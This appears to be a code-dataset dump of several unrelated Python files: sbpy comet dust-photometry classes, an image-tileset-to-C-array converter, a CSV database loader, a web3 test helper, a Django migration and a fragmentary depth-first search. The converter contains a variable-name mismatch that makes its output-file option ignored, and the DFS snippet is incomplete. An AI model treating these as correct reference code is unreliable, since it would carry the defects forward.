>>> from sbpy.activity import Afrho
>>> afrho = Afrho(3387.92, u.cm)
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au,
... 'phase': 17.8 * u.deg}
>>> afrho.mag('vegamag', aper, eph, bandpass='cousins_i',
... phasecor=True) # doctest: +REMOTE_DATA +IGNORE_OUTPUT
8.49 # doctest: +REMOTE_DATA +FLOAT_CMP
Notes
-----
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
A discussion of magnitude zero points can be found in the
`synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
if m_sun is None and bandpass is None:
raise ValueError('One of `bandpass` or `m_sun` must be provided.')
afrho0 = Afrho.from_mag(0, unit, aper, eph, bandpass=bandpass,
m_sun=m_sun, verbose=verbose, **kwargs)
return -2.5 * np.log10(self.cm / afrho0.cm)
def to_phase(self, to_phase, from_phase, Phi=None):
"""
Scale Afρ to another phase angle.
Parameters
----------
to_phase : `~astropy.units.Quantity`
New target phase angle.
from_phase : `~astropy.units.Quantity`
Current target phase angle.
Phi : callable or `None`
Phase function, a callable object that takes a single
parameter, phase angle as a `~astropy.units.Quantity`, and
returns a scale factor. If ``None``,
`~phase_HalleyMarcus` is used. The phase function is
expected to be 1.0 at 0 deg.
Returns
-------
afrho : `~Afrho`
The scaled Afρ quantity.
Examples
--------
>>> from sbpy.activity import Afrho
>>> afrho = Afrho(10 * u.cm).to_phase(15 * u.deg, 0 * u.deg)
>>> afrho.cm # doctest: +FLOAT_CMP
5.87201
"""
if Phi is None:
Phi = phase_HalleyMarcus
return self * Phi(to_phase) / Phi(from_phase)
class Efrho(u.SpecificTypeQuantity):
"""
Coma dust quantity for thermal emission.
``Efrho`` objects are Astropy `~astropy.units.Quantity`s with
units of length.
Parameters
----------
value : number, astropy `~astropy.units.Quantity`
The value(s).
unit : str, `~astropy.units.Unit`
The unit of the input value, if `value` is a number. If a
string, it must be parseable by :mod:`~astropy.units` package.
dtype : `~numpy.dtype`, optional
See `~astropy.units.Quantity`.
copy : bool, optional
See `~astropy.units.Quantity`.
Notes
-----
εfρ is the product of dust emissivity, dust filling factor, and
circular aperture radius. It is nominally a constant for a
steady-state coma in free expansion, and is the thermal emission
equivalent for the Afρ quanitity. See Kelley et al. (2013) for
details.
References
----------
A'Hearn et al. 1984, AJ 89, 579-591.
Kelley et al. 2013, Icarus 225, 475-494.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> print(Efrho(1000 * u.cm))
1000.0 cm
"""
_equivalent_unit = u.meter
_include_easy_conversion_members = True
def __new__(cls, value, unit=None, dtype=None, copy=None):
return super().__new__(cls, value, unit=unit, dtype=dtype, copy=copy)
@staticmethod
def _planck(Tscale, T, eph):
"""Planck function and temperature for dust thermal emission."""
from synphot import SourceSpectrum
from synphot.models import BlackBody1D
if T is None:
T = Tscale * 278 / np.sqrt(eph['rh'] / u.au) * u.K
# Does not include the factor of pi:
return SourceSpectrum(BlackBody1D, temperature=T)
@staticmethod
def _observe_through_filter(bp, B, unit):
from synphot import Observation
from ..spectroscopy.vega import default_vega
obs = Observation(B, bp)
wave = obs.effective_wavelength()
fluxd = obs.effstim(unit)
return wave, fluxd
@classmethod
def from_fluxd(cls, wave_or_freq, fluxd, aper, eph, Tscale=1.1,
T=None, B=None):
"""Initialize from flux density.
Assumes the small angle approximation.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation. Ignored if
``B`` is provided.
fluxd : `~astropy.units.Quantity`
Spectral flux density.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> wave = 15.8 * u.um
>>> fluxd = 6.52 * u.mJy
>>> aper = 11.1 * u.arcsec
>>> eph = {'rh': 4.42 * u.au, 'delta': 4.01 * u.au}
>>> efrho = Efrho.from_fluxd(wave, fluxd, aper, eph=eph)
>>> efrho.cm # doctest: +FLOAT_CMP
120.00836963059808
"""
fluxd1cm = Efrho(1 * u.cm).fluxd(
wave_or_freq, aper, eph=eph, Tscale=Tscale, T=T, B=B,
unit=fluxd.unit)
fluxd1cm = fluxd1cm.to(fluxd.unit, u.spectral_density(wave_or_freq))
return Efrho((fluxd / fluxd1cm).decompose() * u.cm)
@classmethod
def from_filt(cls, bandpass, fluxd, aper, eph, Tscale=1.1, T=None):
"""Initialize from filter bandpass and flux density.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
The filter bandpass for ``fluxd`` as the name of a filter,
or a transmission spectrum as a
`~synphot.SpectralElement`. See
:ref:`sbpy_spectral_standards` for calibration notes.
fluxd : `~astropy.units.Quantity`
Flux density per unit wavelength or frequency.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an `~sbpy.activity.Aperture`.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if ``phasecor`` is enabled.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` is
provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function.
Examples
--------
Notes
-----
Built-in filter names can be found in the `~synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
"""
B = cls._observe_through_filter(
bandpass, cls._planck(Tscale, T, eph), fluxd.unit)[1] / u.sr
return cls.from_fluxd(None, fluxd, aper, eph, B=B)
@classmethod
def from_mag(cls, mag, unit, aper, eph, bandpass=None, fluxd0=None,
Tscale=1.1, verbose=True, **kwargs):
"""Initialize from filter and magnitude.
Parameters
----------
mag : float
Apparent magntiude.
unit : string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``flux0`` is provided. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an `~sbpy.activity.Aperture`.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances.
bandpass : `~synphot.SpectralElement`, optional
The filter bandpass for ``mag``.
fluxd0 : float, optional
Spectral flux density for 0th mag.
**kwargs :
Any other `Efrho.fluxd` keyword argument except ``S``.
Examples
--------
Ficticious 10th mag comet observed through Spitzer/IRS 22-μm
imager:
>>> import astropy.units as u
>>> from synphot import SpectralElement
>>> from sbpy.activity import Efrho
>>> mag = 10.0
>>> bp = SpectralElement.from_file('https://irsa.ipac.caltech.edu/'
... 'data/SPITZER/docs/files/spitzer/redPUtrans.txt', wave_unit='um',
... comment=';') # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au}
>>> efrho = Efrho.from_mag(mag, 'vegamag', aper, eph, bandpass=bp)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> efrho.value # doctest: +REMOTE_DATA +FLOAT_CMP
3423.6675739077887
Notes
-----
A discussion of magnitude zero points can be found in the
`~synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
from ..spectroscopy.vega import default_vega
if bandpass is None and fluxd0 is None:
raise ValueError('One of `bandpass` or `fluxd0` must be provided.')
if fluxd0 is None:
if unit.lower() == 'vegamag':
vega = default_vega.get()
fluxd0 = vega.filt(bandpass, unit='W/(m2 um)')[1]
elif unit.lower() == 'abmag':
fluxd0 = u.Quantity(10**(-0.4 * 48.60), 'erg/(s cm2 Hz)')
elif unit.lower() == 'stmag':
fluxd0 = u.Quantity(10**(-0.4 * 21.10), 'erg/(s cm2 AA)')
else:
raise ValueError(
'Magnitude system must be one of vegamag, abmag, or stmag.')
if verbose:
print('Using fluxd0 = {:.4g}'.format(fluxd0))
fluxd = fluxd0 * 10**(-0.4 * mag)
if kwargs.get('B') is None:
return cls.from_filt(bandpass, fluxd, aper, eph, Tscale=Tscale,
**kwargs)
else:
return cls.from_fluxd(None, fluxd, aper, eph, Tscale=Tscale,
**kwargs)
def fluxd(self, wave_or_freq, aper, eph, Tscale=1.1, T=None, unit=None,
B=None):
"""Coma flux density.
Assumes the small angle approximation.
Parameters
----------
wave_or_freq : `~astropy.units.Quantity`
Wavelengths or frequencies of the observation.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius(length or
angular units), or as an sbpy `~sbpy.activity.Aperture` class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. ``rh`` is not required
when ``aper`` is in units of length.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
unit : `~astropy.units.Unit` or string, optional
Return quantity with this unit. The default behavior is
to inspect ``wave_or_freq`` and return W / (m2 μm) for
wavelengths, Jy for frequency.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Examples
--------
>>> from sbpy.activity import Efrho
>>> import astropy.units as u
>>> efrho = Efrho(120.0, 'cm')
>>> freq = 15.8 * u.um
>>> aper = 11.1 * u.arcsec
>>> eph = {'rh': 4.42 * u.au, 'delta': 4.01 * u.au}
>>> fluxd = efrho.fluxd(freq, aper, eph=eph, unit='Jy')
>>> fluxd.value # doctest: +FLOAT_CMP
0.006519545281786034
"""
from .core import rho_as_length, Aperture
from .. import bib
bib.register('activity.dust.Efrho.fluxd',
{'model', '2013Icar..225..475K'})
# check aperture radius
if isinstance(aper, Aperture):
rho = aper.coma_equivalent_radius()
else:
rho = aper
rho = rho_as_length(rho, eph)
if unit is None:
# choose unit based on B or spectral unit
if B is not None:
unit = B.unit
elif wave_or_freq.unit.is_equivalent(u.m):
unit = u.Unit('W/(m2 um)')
else:
unit = u.Unit('Jy')
else:
# user's requested unit
unit = u.Unit(unit)
if B is None:
# _planck does not include the factor of pi, but is in flux
# density units
_B = self._planck(Tscale, T, eph)
B = _B(wave_or_freq, flux_unit=unit) / u.sr
fluxd = self * rho / eph['delta']**2 * np.pi * B * u.sr
return fluxd.to(B.unit * u.sr)
def filt(self, bandpass, aper, eph, Tscale=1.1, T=None, B=None,
unit='W/(m2 um)'):
"""Coma flux density through a filter.
Parameters
----------
bandpass : string or `~synphot.SpectralElement`
Compute the coma flux density through this bandpass: the
name of a `~synphot` filter, or a transmission spectrum as
a `~synphot.SpectralElement`. See
:ref:`sbpy_spectral_standards` for calibration notes.
aper : `~astropy.units.Quantity`, `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`
Ephemerides of the comet, describing heliocentric and
geocentric distances as `~astropy.units.Quantity` via
keywords ``rh`` and ``delta``. Phase angle, ``phase``, is
required if `phasecor` is enabled.
Tscale : float, optional
Blackbody temperature scale factor. Ignored if ``T`` or
``B`` is provided.
T : `~astropy.units.Quantity`, optional
Use this temperature for the Planck function. Ignored if
``B`` is provided.
B : `~astropy.units.Quantity`, optional
Use this value for the Planck function (surface brightness
units). Overrides ``T`` and ``Tscale``, ``eph['rh']`` is
ignored.
unit : string or `~astropy.units.Unit`, optional
The spectral unit for the output.
Examples
--------
Returns
-------
fluxd : `~astropy.units.Quantity`
Spectral flux density.
Notes
-----
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
"""
if B is None:
B = self._observe_through_filter(
bandpass, self._planck(Tscale, T, eph), unit) / u.sr
return self.fluxd(None, aper, eph, B=B)
def mag(self, unit, aper, eph, bandpass=None, fluxd0=None, Tscale=1.1,
**kwargs):
"""Coma apparent magnitude.
Parameters
----------
unit : string
Name of magnitude system: 'vegamag', 'ABmag', or 'STmag'.
Ignored if ``fluxd0`` is provided.
aper : `~astropy.units.Quantity` or `~sbpy.activity.Aperture`
Aperture of the observation as a circular radius (length
or angular units), or as an sbpy `~sbpy.activity.Aperture`
class.
eph : dictionary-like or `~sbpy.data.Ephem`, optional
Ephemerides of the comet, describing heliocentric and
geocentric distances.
bandpass : string or `~synphot.SpectralElement`, optional
Compute the 0-mag flux density in this bandpass. Provide
either the name of a `~synphot` filter, or a transmission
spectrum. Ignored if ``fluxd0`` is provided.
fluxd0 : float, optional
Spectral flux density for 0th mag.
**kwargs :
Any other `Efrho.fluxd` keyword argument.
Returns
-------
mag : float
Examples
--------
Reverse of Efrho.from_mag test
>>> import astropy.units as u
>>> from synphot import SpectralElement
>>> from sbpy.activity import Efrho
>>> bp = SpectralElement.from_file('https://irsa.ipac.caltech.edu/'
... 'data/SPITZER/docs/files/spitzer/redPUtrans.txt', wave_unit='um',
... comment=';') # doctest: +REMOTE_DATA +IGNORE_OUTPUT
>>> efrho = Efrho(3423.67, u.cm)
>>> aper = 10000 * u.km
>>> eph = {'rh': 1.45 * u.au,
... 'delta': 0.49 * u.au}
>>> efrho.mag('vegamag', aper, eph, bandpass=bp)
... # doctest: +REMOTE_DATA +IGNORE_OUTPUT
10.0 # doctest: +REMOTE_DATA +FLOAT_CMP
Notes
-----
See :ref:`sbpy_spectral_standards` for calibration notes.
Filter names can be found in the `synphot` `documentation
<http://synphot.readthedocs.io/en/stable/synphot/bandpass.html#synphot-predefined-filter>`_.
A discussion of magnitude zero points can be found in the
`synphot` `documentation
<http://synphot.readthedocs.io/en/latest/synphot/units.html#counts-and-magnitudes>`_.
"""
if fluxd0 is None and bandpass is None:
raise ValueError('One of `bandpass` or `fluxd0` must be provided.')
efrho0 = Efrho.from_mag(0, unit, aper, eph, bandpass=bandpass,
fluxd0=fluxd0, Tscale=Tscale, **kwargs)
return -2.5 * np.log10(self.cm / efrho0.cm)
class Syndynes:
"""Syndynes and Synchrones"""
def __init__(self, orb, date):
self.orb = orb
self.date = date
raise NotImplemented
def plot_syndynes(self, betas, ages, location='500'):
"""
Plot syndynes for an observer.
Parameters
----------
betas: array, mandatory
beta values
ages: array, mandatory
synchrone ages
location: str, optional, default: '500' (geocentric)
observer location MPC code
Returns
-------
ax: `~matplotlib.pyplot.Axes`
Examples
--------
TBD
not yet implemented
"""
pass
| StarcoderdataPython |
5095926 | <filename>main.py
from PIL import Image
from enum import Enum
import argparse
class TileSizeIndex(Enum):
X = 0
Y = 1
class ColorChannelIndexForPIL(Enum):
RED = 0
GREEN = 1
BLUE = 2
ALPHA = 3
class ColorChannelBitOffset(Enum):
ARGB8888_ALPHA = 24
ARGB8888_RED = 16
ARGB8888_GREEN = 8
ARGB8888_BLUE = 0
RGB565_RED = 11
RGB565_GREEN = 5
RGB565_BLUE = 0
RED5 = 3
GREEN6 = 2
BLUE5 = 3
class ScanLimitsInfoIndex(Enum):
START = 0
END = 1
STEP = 2
def main():
args = parse_args()
if(args.output == None):
outputFileName = "tilesToCArray.txt"
else:
outputFilename = args.output
if(args.scan_direction == None):
scanDirection = "LEFT_RIGHT_TOP_BOTTOM"
else:
scanDirection = args.scan_direction
if(args.array_name == None):
arrayName = "tileset"
else:
arrayName = args.array_name
sizeOfATile = (args.x_size, args.y_size)
image = Image.open(args.input).convert("RGBA")
imagePixels = image.load()
check_image_size_divisibility(image.width, image.height, args.x_size, args.y_size)
numberOfTilesInARow = image.width // sizeOfATile[TileSizeIndex.X.value]
numberOfTilesInAColumn = image.height // sizeOfATile[TileSizeIndex.Y.value]
tiles, totalNumberOfTiles = get_tile_pixel_values_and_total_number_of_tiles(numberOfTilesInARow, numberOfTilesInAColumn, sizeOfATile, imagePixels, scanDirection)
print("The number of tiles in a row is {0}".format(numberOfTilesInARow))
print("The number of tiles in a column is {0}".format(numberOfTilesInAColumn))
print("The total number of tiles is {0}".format(totalNumberOfTiles))
tiles = convert_tiles_to_color_format(tiles, totalNumberOfTiles, args.color_format)
outputString = convert_tiles_to_C_3d_array(totalNumberOfTiles, tiles, sizeOfATile, arrayName, args.color_format)
with open(outputFileName, "w") as outputFile:
outputFile.write(outputString)
def convert_tiles_to_C_3d_array(totalNumberOfTiles, tiles, sizeOfATile, arrayName, colorFormat):
currentArrayIndex = 0
outputString = ""
indentation = " " * 4
currentTileIteration = 0
if(colorFormat == "RGB565"):
dataType = "uint16_t"
hexStringLength = 4
elif(colorFormat == "RGB888" or colorFormat == "ARGB8888"):
dataType = "uint32_t"
hexStringLength = 8
arrayDeclarationString = "const {0} {1} [{2}][{3}][{4}] = {{".format(dataType, arrayName, totalNumberOfTiles, sizeOfATile[TileSizeIndex.Y.value], sizeOfATile[TileSizeIndex.X.value])
lengthOfArrayDeclarationString = len(arrayDeclarationString)
outputString += arrayDeclarationString
for tile in tiles:
outputString += "\n"
secondNestIndentation = (lengthOfArrayDeclarationString * ' ') + indentation + "{"
lengthOfFirstNestIndentation = len(secondNestIndentation)
outputString += secondNestIndentation
for i in range(0, sizeOfATile[TileSizeIndex.Y.value]):
outputString += "\n"
outputString += (lengthOfFirstNestIndentation * ' ')
outputString += indentation
outputString += "{"
for j in range(0, sizeOfATile[TileSizeIndex.X.value]):
outputString += "0x{0:0{1}x}".format(tile[(i * sizeOfATile[TileSizeIndex.X.value]) + j], hexStringLength)
if(j == (sizeOfATile[TileSizeIndex.X.value] - 1)):
outputString += ""
else:
outputString += ", "
outputString += "}"
if(i == (sizeOfATile[TileSizeIndex.Y.value] - 1)):
outputString += ""
else:
outputString += ", "
outputString += "\n"
outputString += (lengthOfArrayDeclarationString * ' ')
outputString += indentation
outputString += "}"
currentTileIteration = currentTileIteration + 1
if(currentTileIteration == len(tiles)):
outputString += ""
else:
outputString += ", "
outputString += "\n"
outputString += "};\n"
return outputString
def convert_tiles_to_color_format(tiles, totalNumberOfTiles, colorFormat):
tilesPixelValueList = [[] for i in range(totalNumberOfTiles)]
if(colorFormat == "RGB565"):
tilesPixelValueList = convert_tiles_list_to_rgb565_list(tiles, totalNumberOfTiles)
elif(colorFormat == "RGB888"):
tilesPixelValueList = convert_tiles_list_to_rgb888_list(tiles, totalNumberOfTiles)
elif(colorFormat == "ARGB8888"):
tilesPixelValueList = convert_tiles_list_to_argb8888_list(tiles, totalNumberOfTiles)
return tilesPixelValueList
def convert_tiles_list_to_rgb565_list(tiles, totalNumberOfTiles):
tilesPixelValueList = [[] for i in range(totalNumberOfTiles)]
pixelValueORED = 0
currentTileIndex = 0
for tile in tiles:
for pixelValue in tile:
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.RED.value] >> ColorChannelBitOffset.RED5.value) << ColorChannelBitOffset.RGB565_RED.value
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.GREEN.value] >> ColorChannelBitOffset.GREEN6.value) << ColorChannelBitOffset.RGB565_GREEN.value
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.BLUE.value] >> ColorChannelBitOffset.BLUE5.value) << ColorChannelBitOffset.RGB565_BLUE.value
tilesPixelValueList[currentTileIndex].append(pixelValueORED)
pixelValueORED = 0
currentTileIndex = currentTileIndex + 1
return tilesPixelValueList
def convert_tiles_list_to_rgb888_list(tiles, totalNumberOfTiles):
tilesPixelValueList = [[] for i in range(totalNumberOfTiles)]
pixelValueORED = 0
currentTileIndex = 0
for tile in tiles:
for pixelValue in tile:
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.RED.value] << ColorChannelBitOffset.ARGB8888_RED.value)
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.GREEN.value] << ColorChannelBitOffset.ARGB8888_GREEN.value)
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.BLUE.value] << ColorChannelBitOffset.ARGB8888_BLUE.value)
tilesPixelValueList[currentTileIndex].append(pixelValueORED)
pixelValueORED = 0
currentTileIndex = currentTileIndex + 1
return tilesPixelValueList
def convert_tiles_list_to_argb8888_list(tiles, totalNumberOfTiles):
tilesPixelValueList = [[] for i in range(totalNumberOfTiles)]
pixelValueORED = 0
currentTileIndex = 0
for tile in tiles:
for pixelValue in tile:
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.ALPHA.value] << ColorChannelBitOffset.ARGB8888_ALPHA.value)
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.RED.value] << ColorChannelBitOffset.ARGB8888_RED.value)
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.GREEN.value] << ColorChannelBitOffset.ARGB8888_GREEN.value)
pixelValueORED |= (pixelValue[ColorChannelIndexForPIL.BLUE.value] << ColorChannelBitOffset.ARGB8888_BLUE.value)
tilesPixelValueList[currentTileIndex].append(pixelValueORED)
pixelValueORED = 0
currentTileIndex = currentTileIndex + 1
return tilesPixelValueList
def parse_args():
parser = argparse.ArgumentParser(description="Convert a tileset image to C arrays")
parser.add_argument("-i", "--input", metavar="", required=True, help="The image to be converted")
parser.add_argument("-x", "--x-size", metavar="", required=True, type=int, help="The width of a single tile")
parser.add_argument("-y", "--y-size", metavar="", required=True, type=int, help="The height of a single tile")
parser.add_argument("-c", "--color-format", metavar="", required=True, choices=["RGB565", "RGB888", "ARGB8888"], help="The color format")
parser.add_argument("-o", "--output", metavar="", help="The name of the output file")
parser.add_argument("-s", "--scan-direction", metavar="", choices=["LEFT_RIGHT_TOP_BOTTOM", "RIGHT_LEFT_TOP_BOTTOM", "LEFT_RIGHT_BOTTOM_TOP", "RIGHT_LEFT_BOTTOM_TOP"], help="The scan direction for the image input")
parser.add_argument("-a", "--array-name", metavar="", help="The name of the C array")
args = parser.parse_args()
return args
def get_tile_pixel_values_and_total_number_of_tiles(numberOfTilesInARow, numberOfTilesInAColumn, sizeOfATile, imagePixels, scanDirection):
totalNumberOfTiles = numberOfTilesInARow * numberOfTilesInAColumn
if(scanDirection == "LEFT_RIGHT_TOP_BOTTOM"):
y1ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn, sizeOfATile[TileSizeIndex.Y.value]
y2ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value], 1
x1ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow, sizeOfATile[TileSizeIndex.X.value]
x2ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value], 1
elif(scanDirection == "RIGHT_LEFT_TOP_BOTTOM"):
y1ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn, sizeOfATile[TileSizeIndex.Y.value]
y2ScanLimits = 0, sizeOfATile[TileSizeIndex.Y.value], 1
x1ScanLimits = (sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow) - 1, -1, -(sizeOfATile[TileSizeIndex.X.value])
x2ScanLimits = (sizeOfATile[TileSizeIndex.X.value]) -1, -1, -1
elif(scanDirection == "LEFT_RIGHT_BOTTOM_TOP"):
y1ScanLimits = (sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn) -1, -1, -(sizeOfATile[TileSizeIndex.Y.value])
y2ScanLimits = (sizeOfATile[TileSizeIndex.Y.value]) -1, -1, -1
x1ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow, sizeOfATile[TileSizeIndex.X.value]
x2ScanLimits = 0, sizeOfATile[TileSizeIndex.X.value], 1
elif(scanDirection == "RIGHT_LEFT_BOTTOM_TOP"):
y1ScanLimits = (sizeOfATile[TileSizeIndex.Y.value] * numberOfTilesInAColumn) -1, -1, -(sizeOfATile[TileSizeIndex.Y.value])
y2ScanLimits = (sizeOfATile[TileSizeIndex.Y.value]) -1, -1, -1
x1ScanLimits = (sizeOfATile[TileSizeIndex.X.value] * numberOfTilesInARow) - 1, -1, -(sizeOfATile[TileSizeIndex.X.value])
x2ScanLimits = (sizeOfATile[TileSizeIndex.X.value]) -1, -1, -1
tiles = get_tile_pixel_values(numberOfTilesInARow, numberOfTilesInAColumn, totalNumberOfTiles, imagePixels, y1ScanLimits, y2ScanLimits, x1ScanLimits, x2ScanLimits)
return tiles, totalNumberOfTiles
def get_tile_pixel_values(numberOfTilesInARow, numberOfTilesInAColumn, totalNumberOfTiles, imagePixels, y1ScanLimits, y2ScanLimits, x1ScanLimits, x2ScanLimits):
tiles = [[] for i in range(totalNumberOfTiles)]
indexOfATile = 0
tileNumberOffset = 0
currentRow = 0
currentColumn = 0
for y1 in range(y1ScanLimits[ScanLimitsInfoIndex.START.value], y1ScanLimits[ScanLimitsInfoIndex.END.value], y1ScanLimits[ScanLimitsInfoIndex.STEP.value]):
tileNumberOffset = currentRow * numberOfTilesInARow
for y2 in range(y2ScanLimits[ScanLimitsInfoIndex.START.value], y2ScanLimits[ScanLimitsInfoIndex.END.value], y2ScanLimits[ScanLimitsInfoIndex.STEP.value]):
indexOfATile = 0
for x1 in range(x1ScanLimits[ScanLimitsInfoIndex.START.value], x1ScanLimits[ScanLimitsInfoIndex.END.value], x1ScanLimits[ScanLimitsInfoIndex.STEP.value]):
indexOfATile = tileNumberOffset + currentColumn
for x2 in range(x2ScanLimits[ScanLimitsInfoIndex.START.value], x2ScanLimits[ScanLimitsInfoIndex.END.value], x2ScanLimits[ScanLimitsInfoIndex.STEP.value]):
tiles[indexOfATile].append(imagePixels[x1 + x2, y1 + y2])
currentColumn = currentColumn + 1
currentColumn = 0
currentRow = currentRow + 1
return tiles
def check_image_size_divisibility(imageXSize, imageYSize, tileXSize, tileYSize):
if(imageXSize % tileXSize != 0):
print("X size not divisible!")
exit()
if(imageYSize % tileYSize != 0):
print("Y size not divisible!")
exit()
if __name__ == '__main__':
main()
| StarcoderdataPython |
5002055 | """
Filename: workout_data.py
Purpose: Loads the workout data into the database from a csv file
Authors: <NAME>
Group: Wholesome as Heck Programmers (WaHP)
Last modified: 11/13/21
"""
from db_manager import db_mgr
import csv
# Boolean to delete data from the workouts table
# Useful for debugging and initially setting up
DELETE_DATA = True
# The workout table's column names
data_keys = ['type', 'name', 'equipment', 'difficulty', 'is_priority']
data_to_insert = []
# Load the csv file and convert it into a list of dictionaries so it
# can be inserted into the database
with open("workout_data.csv", newline="") as csv_data:
# Initialize the spamreader to read from the csv file
spamreader = csv.reader(csv_data, delimiter=',', quotechar='|')
for row in spamreader:
new_row = {}
count = 0
# Make a dictionary for the current row (column name, value)
for key in data_keys:
value_data = row[count + 1]
# Weird case for commas in csv column, need to grab two values
if '"' in value_data:
value_data += ',' + row[count + 2]
value_data = value_data.strip('"')
count += 1
if value_data == "TRUE":
value_data = True
elif value_data == "FALSE":
value_data = False
new_row[key] = value_data
count += 1
# Add the dictionary row to the list
data_to_insert.append(new_row)
print(f"Converted data from row {len(data_to_insert)}")
# For debugging, deletes all rows from the workouts table
if DELETE_DATA:
db_mgr.delete_rows('workouts')
# Insert the data into the workouts table
res = db_mgr.add_many_rows('workouts', data_to_insert)
if res:
print("Inserted data into database successfully!") | StarcoderdataPython |
217588 | import os
from unittest import TestCase
import pytest
from web3 import Web3
from web3.middleware import geth_poa_middleware
class MockTestCase(TestCase):
@pytest.fixture(autouse=True)
def __inject_fixtures(self, mocker):
self.mocker = mocker
def get_mainnet_provider():
return _get_web3_provider("mainnet")
def _get_web3_provider(net: str):
w3 = Web3(
Web3.HTTPProvider(
f"https://{net}.infura.io/v3/{os.getenv('INFURA_PROJECT_ID')}"
)
)
w3.middleware_onion.inject(geth_poa_middleware, layer=0)
return w3
| StarcoderdataPython |
9602011 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-09-03 11:01
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Focus',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('note_info', models.CharField(default='', max_length=200)),
],
options={
'verbose_name': '股票',
'db_table': 'focus',
},
),
migrations.CreateModel(
name='Info',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('code', models.CharField(max_length=10, verbose_name='股票代码')),
('short', models.CharField(max_length=20, verbose_name='股票简称')),
('chg', models.CharField(max_length=20, verbose_name='涨跌幅')),
('turnover', models.CharField(max_length=255, verbose_name='换手率')),
('price', models.FloatField(max_length=20, verbose_name='最新价')),
('highs', models.FloatField(max_length=20, verbose_name='前期高点')),
('time', models.DateField()),
],
options={
'verbose_name': '股票',
'db_table': 'info',
},
),
]
| StarcoderdataPython |
8118516 | <gh_stars>100-1000
def DFS(graph, v):
color = [-1] * v
parent = [-1] * v
time = 0
for i in range(v):
if(color[i] == -1):
DFSvisit(graph, v, i, color, parent, time)
print(color)
print(parent)
def DFSvisit(graph, v, s, color, parent, time):
color[s] = 0
time += 1
for i in range(0,v):
if(graph[s][i]==1):
if(color[i]==0):
print("Cycle detected at:",s)
return
